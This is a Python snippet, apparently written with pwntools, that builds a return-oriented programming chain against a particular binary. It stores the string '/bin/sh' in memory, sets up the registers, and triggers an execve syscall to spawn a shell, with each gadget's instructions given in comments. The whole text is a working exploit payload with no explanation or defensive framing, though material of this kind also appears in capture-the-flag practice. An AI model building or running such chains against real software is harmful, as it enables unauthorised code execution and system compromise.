payload = p64(0x403afd)
#0x0000000000403afd: pop rbx; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x40c070)+p64(0x40632e)
# 0x000000000040632e: xchg eax, ebp; ret; 
payload += p64(0x403b8e)
# 0x0000000000403b8e: mov qword ptr [rax], rbx; pop rbx; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x40c070)+p64(0x4034a7)
# 0x00000000004034a7: mov edx, 0; test rdx, rdx; je 0x34a5; pop rbp; mov rsi, rax; mov edi, 0x6072a0; jmp rdx; 
payload += p64(0x0)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x3b)+p64(0x40632e)
# 0x000000000040632e: xchg eax, ebp; ret; 
payload += p64(0x408e70)
# 0x0000000000408e70: syscall; 
payload += b''
